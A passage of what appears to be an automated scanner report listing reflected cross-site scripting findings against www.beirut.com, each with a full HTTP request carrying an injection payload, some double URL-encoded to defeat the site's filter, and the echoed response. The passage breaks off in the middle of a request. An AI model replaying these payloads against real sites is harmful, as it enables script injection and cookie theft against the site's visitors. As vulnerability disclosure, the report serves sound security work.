Date: Tue, 25 Jan 2011 06:21:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo/Theater9dc4b'-alert(1)-'c46cc983fae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1148. http://www.beirut.com/ThingsToDo/ThisWeek [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/ThisWeek

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d0fc46928 was submitted in the REST URL parameter 2. This input was echoed as bef5d"><script>alert(1)</script>34d0fc46928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/ThisWeekbef5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d0fc46928 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:49:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="calsearchdate" id="calsearchdate" value="thisweekbef5d"><script>alert(1)</script>34d0fc46928">
...[SNIP]...

4.1149. http://www.beirut.com/ThingsToDo/Today [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Today

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01c41aa6c91 was submitted in the REST URL parameter 2. This input was echoed as 31d57"><script>alert(1)</script>01c41aa6c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Today31d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01c41aa6c91 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:46:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="calsearchdate" id="calsearchdate" value="today31d57"><script>alert(1)</script>01c41aa6c91">
...[SNIP]...

4.1150. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a4b'-alert(1)-'a77bc873a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo14a4b'-alert(1)-'a77bc873a07/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:00:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo14a4b'-alert(1)-'a77bc873a07/Workshops';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1151. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde96"><a>8295435d836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDocde96"><a>8295435d836/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDocde96"><a>8295435d836/Workshops&listingtype=events.php&Types=">
...[SNIP]...

4.1152. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f61ed"><a>f3139efe8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Workshopsf61ed"><a>f3139efe8d2/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDo/Workshopsf61ed"><a>f3139efe8d2&listingtype=events.php&Types=10">
...[SNIP]...

4.1153. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6acb'-alert(1)-'0c3b23e60e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Workshopsd6acb'-alert(1)-'0c3b23e60e/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:16:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Workshopsd6acb'-alert(1)-'0c3b23e60e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1154. http://www.beirut.com/chat [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/chat

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c987"><a>d63d286407e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /chat4c987"><a>d63d286407e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=chat4c987"><a>d63d286407e&listingtype=chat.php&Types=">
...[SNIP]...

4.1155. http://www.beirut.com/chat [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/chat

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fad6c'-alert(1)-'923a80d881e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /chatfad6c'-alert(1)-'923a80d881e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:25:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='chatfad6c'-alert(1)-'923a80d881e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1156. http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/images/closelabel.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/images/closelabel.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1477%2527%253balert%25281%2529%252f%252fa6d5164ce23 was submitted in the REST URL parameter 5. This input was echoed as c1477';alert(1)//a6d5164ce23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/c1477%2527%253balert%25281%2529%252f%252fa6d5164ce23/closelabel.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:29:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='c1477';alert(1)//a6d5164ce23';
var showfacebox='';
</script>
...[SNIP]...

4.1157. http://www.beirut.com/css/blue/images/search-btn.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/blue/images/search-btn.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4429e%2527%253balert%25281%2529%252f%252f59f8c7185c5 was submitted in the REST URL parameter 3. This input was echoed as 4429e';alert(1)//59f8c7185c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/4429e%2527%253balert%25281%2529%252f%252f59f8c7185c5/search-btn.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/widget/beirutsearchwidget.php?widgetsize=300x130
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 22:18:30 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=ec59pmbi0dmpgkk66bbc3dc396; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='4429e';alert(1)//59f8c7185c5';
var showfacebox='';
</script>
...[SNIP]...

4.1158. http://www.beirut.com/css/blue/images/search-ico.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/blue/images/search-ico.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b39%2527%253balert%25281%2529%252f%252fad7443dd2e7 was submitted in the REST URL parameter 3. This input was echoed as f6b39';alert(1)//ad7443dd2e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/f6b39%2527%253balert%25281%2529%252f%252fad7443dd2e7/search-ico.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/widget/beirutsearchwidget.php?widgetsize=300x130
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 22:18:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=pt385kpoqt8v89a9sf32dnfg46; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='f6b39';alert(1)//ad7443dd2e7';
var showfacebox='';
</script>
...[SNIP]...

4.1159. http://www.beirut.com/css/purple/images/search-btn.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/purple/images/search-btn.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12fd8%2527%253balert%25281%2529%252f%252ff021c0b24ff was submitted in the REST URL parameter 3. This input was echoed as 12fd8';alert(1)//f021c0b24ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/12fd8%2527%253balert%25281%2529%252f%252ff021c0b24ff/search-btn.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='12fd8';alert(1)//f021c0b24ff';
var showfacebox='';
</script>
...[SNIP]...

4.1160. http://www.beirut.com/css/purple/images/search-ico.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/purple/images/search-ico.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c21a0%2527%253balert%25281%2529%252f%252f6ac55102261 was submitted in the REST URL parameter 3. This input was echoed as c21a0';alert(1)//6ac55102261 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/c21a0%2527%253balert%25281%2529%252f%252f6ac55102261/search-ico.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
